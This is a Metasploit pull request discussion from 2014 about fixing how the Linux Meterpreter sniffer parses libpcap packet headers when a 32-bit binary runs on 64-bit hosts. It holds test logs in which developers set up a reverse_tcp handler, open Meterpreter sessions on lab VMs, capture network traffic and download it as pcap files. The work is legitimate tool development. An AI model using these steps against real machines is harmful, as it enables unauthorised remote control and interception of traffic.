Closed jvazquez-r7 closed 10 years ago
Paging Dr. @OJ.
It should be defined as an int if you want it to stay at 32 bits on both x86 and x64 systems?
Test PASSED. Refer to this link for build results: https://ci.metasploit.com/job/GPR-MeterpreterWin/121/
According to my testing, this patch is also fixing https://dev.metasploit.com/redmine/issues/6527
msf exploit(handler) > rexploit
[*] Reloading module...
[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1228800 bytes) to 172.16.158.206
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.206:37080) at 2014-07-11 16:47:25 -0500
meterpreter > load sniffer
Loading extension sniffer...success.
meterpreter > sniffer_interfaces
1 - 'eth0' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )
2 - 'any' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )
3 - 'lo' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )
meterpreter > sniffer_start 2
[*] Capture started on interface 2 (50000 packet buffer)
meterpreter > sniffer_stats 2
[*] Capture statistics for interface 2
packets: 2
bytes: 232
meterpreter > sniffer_stop 2
[*] Capture stopped on interface 2
[*] There are 2 packets (232 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'
meterpreter > sniffer_dump 2 /tmp/pcap2.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 2 packets (272 bytes)
[*] Downloaded 100% (272/272)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /tmp/pcap2.pcap
meterpreter >
msf exploit(handler) > rexploit
[*] Reloading module...
[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1138688 bytes) to 172.16.158.206
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.206:37083) at 2014-07-11 16:51:57 -0500
meterpreter > load sniffer
Loading extension sniffer...success.
meterpreter > sniffer_interfaces
1 - 'eth0' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )
2 - 'any' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )
3 - 'lo' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )
meterpreter > sniffer_start 2
[*] Capture started on interface 2 (50000 packet buffer)
meterpreter > sniffer_stats 2
[*] Capture statistics for interface 2
packets: 129
bytes: 12904
meterpreter > sniffer_stop 2
[*] Capture stopped on interface 2
[*] There are 129 packets (12904 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'
meterpreter > sniffer_dump 2 /tmp/pcap3.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 129 packets (15484 bytes)
[*] Downloaded 100% (15484/15484)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /tmp/pcap3.pcap
meterpreter >
Looking much better for me on x64
msf exploit(handler) > exploit
[*] Started reverse handler on 10.1.10.40:8000
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1236992 bytes) to 10.1.10.40
[*] Meterpreter session 1 opened (10.1.10.40:8000 -> 10.1.10.40:55463) at 2014-07-12 20:11:31 +1000
meterpreter > use sniffer
Loading extension sniffer...success.
meterpreter > sniffer_interfaces
1 - 'em1' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )
2 - 'vmnet1' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )
3 - 'vmnet2' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )
4 - 'vmnet8' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )
5 - 'any' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )
6 - 'lo' ( type:0 mtu:1514 usable:false dhcp:false wifi:false )
meterpreter > sniffer_start 1
[*] Capture started on interface 1 (50000 packet buffer)
meterpreter > sniffer_stats 1
meterpreter > sniffer_stats 1
[*] Capture statistics for interface 1
packets: 3146
bytes: 1827432
meterpreter > sniffer_dump 1 /tmp/cap.pcap
[*] Flushing packet capture buffer for interface 1...
[*] Flushed 3786 packets (2059493 bytes)
[*] Downloaded 025% (524288/2059493)...
[*] Downloaded 050% (1048576/2059493)...
[*] Downloaded 076% (1572864/2059493)...
[*] Downloaded 100% (2059493/2059493)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /tmp/cap.pcap
meterpreter > sniffer_stop 1
[*] Capture stopped on interface 1
[*] There are 519 packets (107380 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'
meterpreter > sniffer_release 1
[*] Flushed 519 packets (107380 bytes) from interface 1
meterpreter >
I don't have a 32-bit linux set up handy to test this on except for on ubuntu machine and that segfaults when I try to run the meterpreter binary.
For me this doesn't seem to fix the issue with the any
interface:
msf exploit(handler) > exploit
[*] Started reverse handler on 10.1.10.40:8000
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1236992 bytes) to 10.1.10.40
[*] Meterpreter session 2 opened (10.1.10.40:8000 -> 10.1.10.40:55621) at 2014-07-12 20:21:13 +1000
meterpreter > use sniffer
Loading extension sniffer...success.
meterpreter > sniffer_start 5
[*] Capture started on interface 5 (50000 packet buffer)
... < did lots of internetty things > ...
meterpreter > sniffer_stats 5
[*] Capture statistics for interface 5
packets: 2
bytes: 577
@OJ mmmm is it a real host with vmware installed, right? (I mean for the 'any' sniffing issue). Do you mind to share with me details of the machine where you're running meterpreter for the 'any' sniffing issue. Would love to reproduce, maybe this patch is just solving https://dev.metasploit.com/redmine/issues/6355 after all :-(
But yup, if I'm able to reproduce hopefully I'll be able to try a real patch for https://dev.metasploit.com/redmine/issues/6527 ! :)
Thanks for testing!
@jvazquez-r7 This machine is a Fedora 19 x64 machine:
$ uname -a
Linux ropchain.local 3.14.8-100.fc19.x86_64 #1 SMP Mon Jun 16 21:53:59 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
It does run VMWare Workstation 10.
The sniffer sets up and runs fine, but it doesn't appear to capture any packets for the any
interface. The other interfaces appear to work fine.
Anything else I can give you that might help?
Thanks @OJ, will try to put a virtual environment with Fedora 19 x64 and see if I can reproduce. I've modified https://dev.metasploit.com/redmine/issues/6527 to turn back to Assigned. Will dig into it. Anyway the original purpose of this pull request was to solve https://dev.metasploit.com/redmine/issues/6355. Had the hope maybe was solving RM 6527 too.
If you haven't stoppers, and is working for you, feel free to land it once you're ready. I'll try to work on RM 6527 next week, hopefully with your feedback I'll be able to repro in a Fedora system and dig into it! Thanks!
If you haven't stoppers, and is working for you, feel free to land it once you're ready <== I mean if it's solving RM 6355 and here aren't stoppers about this issue. If this pull request is not solving RM 6355, or there is a better way or there are comments, should be fixed before landing, of course.
Thanks!
I will do as soon as I can test it on a 32-bit env :)
The binary that I have compiled doesn't seem to be very happy on x86 at all. It runs happily on x64 (both Fedora and Ubuntu), but not on any x86 distro that I have tried (including Debian and Ubuntu).
Not sure what the issue is. This wouldn't have anything to do with your change, I have the same problem with the binaries that are currently in MSF master.
I've downloaded and built the meterpreter source on a 32-bit Ubuntu, but the generated binary refuses to work just like it used to when @jlee-r7 and I were looking into it. I'll try it on a 32-bit fedora later (have to download and install it).
Given that this is "no worse" than it currently stands I think it will be fine to land it. But it's an issue we can't currently build and/or run on x86.
@jvazquez-r7 are you able to build a functional binary that runs on x86?
@OJ, yes I'm able to build a functional binary that runs on x86.
I also had problems using the the bfd linker on some Ubuntu versions. On https://dev.metasploit.com/redmine/issues/6318 I've added instruction about how I've been able build meterpreter smoothly from Ubuntu and Fedora. Hope it helps.
@OJ, I'm a little bit worried also about your note: Not sure what the issue is. This wouldn't have anything to do with your change, I have the same problem with the binaries that are currently in MSF master
.
I'm trying the binaries in master on 32 bits Ubuntu and are working on my virtual machines
msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > rexploit
[*] Reloading module...
[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1228800 bytes) to 172.16.158.194
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.194:53626) at 2014-07-13 11:16:19 -0500
meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000
meterpreter > sysinfo
Computer : ubuntu
OS : Linux ubuntu 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 (i686)
Architecture : i686
Meterpreter : x86/linux
meterpreter >
msf exploit(handler) > rexploit
[*] Reloading module...
[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1228800 bytes) to 172.16.158.195
[*] Meterpreter session 3 opened (172.16.158.1:4444 -> 172.16.158.195:47745) at 2014-07-13 11:20:22 -0500
meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000
meterpreter > sysinfo
Computer : ubuntu
OS : Linux ubuntu 3.11.0-12-generic #19-Ubuntu SMP Wed Oct 9 16:12:00 UTC 2013 (i686)
Architecture : i686
Meterpreter : x86/linux
meterpreter >
The binaries on master currently are not working on your ubuntu machines? that would be a hassle :(
Also if you would like, I could add my binaries compiled for this pull request. So you can test if they work on your 32 bits environments. Just let me know if you want me to add the binaries to this pull request.
You compiling it with the correct version of gcc @oj? @jlee-r7 knows the details!
@Meatballs1 yeah I've been compiling this thing for ages mate.
@jvazquez-r7 I've tried those bins on 2 ubuntu installations, both break. Not sure why yet. I will try to dig into it.
I wouldn't be surprised if it was just an issue with things at my end. Your fix is outside the realms of this issue, so I'm going to land this.
This patch tries to fix: https://dev.metasploit.com/redmine/issues/6355
Also, maybe is also fixing https://dev.metasploit.com/redmine/issues/6527. There are no instruction to reproduce RM 6427, not sure if it's enough with just let the sniffer running for a while? ping @jlee-r7 . Anyway I'll look harder into RM 6427 and update this pull request and the rm ticket if this patch solves also the issue.This pull request isn't solving RM 6427 according to @OJ testThe problem with https://dev.metasploit.com/redmine/issues/6355 happens when libpcap uses
TPACKET_V1
. The definition oftpacket_hdr
onif_packet.h
is:The problem comes from the
tp_status
field being defined as unsigned long, which is 8 bytes on 64bits archs, and 4 bytes on 32bits archs. When running meterpreter (32 bits app) on 64 bits machines, libpcap doesn't parse the header correctly, sending an incorrect pointer to thesniffer
extension.Since using
TPACKET_V1
allows compatibility with kernels beforeTPACKET_V1
TPACKET_V2
, patching pcap to guess if the system is 32 bits or 64 bits sounds a good solution.Since we need to guess 32bits vs 64 bits at runtime
uname
is being used. (Remember we're running a 32 bits application on a 64 bits machine, when proposing other methods to guess the host arch).Maybe this patch is not perfect, and there is a better solution out there to deal with something like that. Feedback is super welcome.
Verification